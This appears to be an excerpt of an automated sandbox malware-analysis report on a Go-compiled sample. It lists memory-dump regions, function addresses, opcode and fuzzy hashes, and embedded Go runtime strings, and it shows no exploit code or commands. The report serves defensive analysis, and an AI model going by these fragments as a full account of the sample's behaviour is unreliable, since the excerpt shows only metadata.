Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4038fa4739942293bfcdbf44871184d6d687a64c6e1ddea83cfd011f61599a3d
Instruction ID: 407da9e02177eb3beb9a7fe719e31ca5d5d39b156bc1fe1924453c6a77b8e1dd
Opcode Fuzzy Hash: 4038fa4739942293bfcdbf44871184d6d687a64c6e1ddea83cfd011f61599a3d
Instruction Fuzzy Hash: 4A719073654BC882EB158F95E98839BA762F399BC4F545126FB8913BDACB78C041C740

Function 000002EBF9BABDE0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4dcb452dbe326ee11ad98d37258410e0fc5b1d75875be17fd47957e39e3d9a
Instruction ID: f1ca024f08fa286bf6f51f4b026e14840c5f978c08970124c8eab546e5325d90
Opcode Fuzzy Hash: 6a4dcb452dbe326ee11ad98d37258410e0fc5b1d75875be17fd47957e39e3d9a
Instruction Fuzzy Hash: FB71F732644BC486EB5A9B65E84839BF7A1F74ABD0F189212FE6953FD7DB38C0548700

Function 000002EBF9B99A60 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1434e92d3be2f4315cd51e75cb3cd554ba5acb6737e53872cc67c8c702e59e3d
Instruction ID: 0f20f389944296af446d0cecf32b0ab9d02d57137b02c878239a76454e05affb
Opcode Fuzzy Hash: 1434e92d3be2f4315cd51e75cb3cd554ba5acb6737e53872cc67c8c702e59e3d
Instruction Fuzzy Hash: 7D514895750A9A41FF458A6289241AFB361E74EFD0B98B233DF1E77BA9C73CD4028344

Function 000002EBF9BDB700 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18ab03d2e3fa9c8aa021157fffd9deb763922303a2653c8d3d329934038851b
Instruction ID: 63b0293acfe00dadf4bf2ad46adf95024582425c9e573a3dab11e84099fd17de
Opcode Fuzzy Hash: a18ab03d2e3fa9c8aa021157fffd9deb763922303a2653c8d3d329934038851b
Instruction Fuzzy Hash: 2651E512B449A08BFB15DFA5D8853ABA391A78CB94F884526E76C43BC7D72CC5908704

Function 000002EBF9BAE3A0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4dc183377d4878d65213a68af26a4ad42cccd526cab30841baf4e30d16f60c
Instruction ID: 4251aa5f98ac7547a208171194a76dfd850d9643e9106f99d0be98bea13597d1
Opcode Fuzzy Hash: 5a4dc183377d4878d65213a68af26a4ad42cccd526cab30841baf4e30d16f60c
Instruction Fuzzy Hash: C651C372549B8488E61BEF62E85435BA7A5FBDA7C0F14C335BE4D63A66DF38C0918700

Function 000002EBF9BAF660 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa6eccc4a9ba94b9c896c6c792dfffe1ed5a68b4713daa16cbe668ed4f744f3
Instruction ID: 0bc8d949c9b8f8e52a48dbc70ba3373aeaf23d5c82fee6cfecc14a71d69081b0
Opcode Fuzzy Hash: baa6eccc4a9ba94b9c896c6c792dfffe1ed5a68b4713daa16cbe668ed4f744f3
Instruction Fuzzy Hash: 62415C71687E8049DD0FD77BEC68396E216AF97BE1F64D3227C27639F9EB1484428600

Function 000002EBF9B9D440 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2969af83086bdd79f0aa494ad9e29fb91c3309aa649dde7f648b3f8156d96ebe
Instruction ID: 67ea73fa2cd80182db717cf114d66bab13ddf508c59cdcd960b485b27ff1667a
Opcode Fuzzy Hash: 2969af83086bdd79f0aa494ad9e29fb91c3309aa649dde7f648b3f8156d96ebe
Instruction Fuzzy Hash: 1E2150B1E65E844ADF47DB7AC4003169206AF967C0F58C722BD1B77BA6E734D4D34240

Function 000002EBF9BB3E00 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1700b36374d500ff2c3c29ac3689c6b32befdf1ac30396aa0320829db839c421
Instruction ID: 88182db43f84752660b219ef45cabc35352db455cbd4fd08591ae1360a9daa1a
Opcode Fuzzy Hash: 1700b36374d500ff2c3c29ac3689c6b32befdf1ac30396aa0320829db839c421
Instruction Fuzzy Hash: D3315C7A354B8585EB499B15E8953DB6762E789BC0F84C032AE4E03FAADF38C549C700

Function 000002EBF9BF1A40 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f73dc23dbf48fd0640d96de9f0a03de867622fec83259250efe15228f47e99
Instruction ID: 6e87204e6fe96d49e3c618001e270bb52576b3774944ef0ab4d33b8b451a0c77
Opcode Fuzzy Hash: d7f73dc23dbf48fd0640d96de9f0a03de867622fec83259250efe15228f47e99
Instruction Fuzzy Hash: ADC08CF094AAC928FB32C3C0F90830639C6CB09388D909080E26844A6AE72C86804104

Function 000002EBF9BA7700 Relevance: 14.1, Strings: 11, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: first argument is nilruntime: releaseSudog with non-nil gp.paramunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapactive sweepers found at start of mark phasecompileCallback: float results not supported, xrefs: 000002EBF9BA7DAA
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: first argument was allocated into an arenaruntime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiv, xrefs: 000002EBF9BA7D53
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
runtime.SetFinalizer: pointer not in allocated blockspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - dead, xrefs: 000002EBF9BA7D42
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D
, not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer, xrefs: 000002EBF9BA7D86
runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLoc, xrefs: 000002EBF9BA7D95

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$, not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: first argument is nilruntime: releaseSudog with non-nil gp.paramunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapactive sweepers found at start of mark phasecompileCallback: float results not supported$runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLoc$runtime.SetFinalizer: first argument was allocated into an arenaruntime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiv$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: pointer not in allocated blockspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - dead$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-1907286271
Opcode ID: f574a6ee554974cfbaa05de4e2ecbe68e917356fc07a478db9a6fb25f87859ab
Instruction ID: bfc1e64a2ad1ef7a110fc375d28bf469f35c9cbe840470b43afb6d4111b63804
Opcode Fuzzy Hash: f574a6ee554974cfbaa05de4e2ecbe68e917356fc07a478db9a6fb25f87859ab
Instruction Fuzzy Hash: 16028432A49BC491EB669F51E88839BB7A5F789B80F448126FA9C13F96DF3CC444C710

Function 000002EBF9B97F80 Relevance: 12.7, Strings: 10, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

debugCal, xrefs: 000002EBF9B98072
l655, xrefs: 000002EBF9B981B5
debugCal, xrefs: 000002EBF9B98170
call from within the Go runtimecasgstatus: bad incoming valuescheckmark found unmarked objectinternal error - misuse of itabnon in-use span in unswept listresetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: pro, xrefs: 000002EBF9B981FB, 000002EBF9B98207
call not at safe pointcompileCallabck: type duplicated defer entryduplicatehandle failedfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnon-positive dimen, xrefs: 000002EBF9B98282, 000002EBF9B9828E
debugCal, xrefs: 000002EBF9B980D8
debugCal, xrefs: 000002EBF9B9812E
call from unknown functioncorrupted semaphore ticketforEachP: P did not run fnfreedefer with d.fn != nilnegative idle mark workersnotewakeup - double wakeupout of memory (stackalloc)persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to me, xrefs: 000002EBF9B97FCD, 000002EBF9B97FD9
debugCal, xrefs: 000002EBF9B98013
runtime., xrefs: 000002EBF9B981D6

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: call from unknown functioncorrupted semaphore ticketforEachP: P did not run fnfreedefer with d.fn != nilnegative idle mark workersnotewakeup - double wakeupout of memory (stackalloc)persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to me$call from within the Go runtimecasgstatus: bad incoming valuescheckmark found unmarked objectinternal error - misuse of itabnon in-use span in unswept listresetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: pro$call not at safe pointcompileCallabck: type duplicated defer entryduplicatehandle failedfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnon-positive dimen$debugCal$debugCal$debugCal$debugCal$debugCal$l655$runtime.
API String ID: 0-3952230108
Opcode ID: b860d768e0b3f449dd54978daed987d03cbf5153f87c610834599d6cc58b4c1a
Instruction ID: 8600736b3be4f1d850143249b68117fb07b1ab5a5fdb3e20ed5300d956ac7366
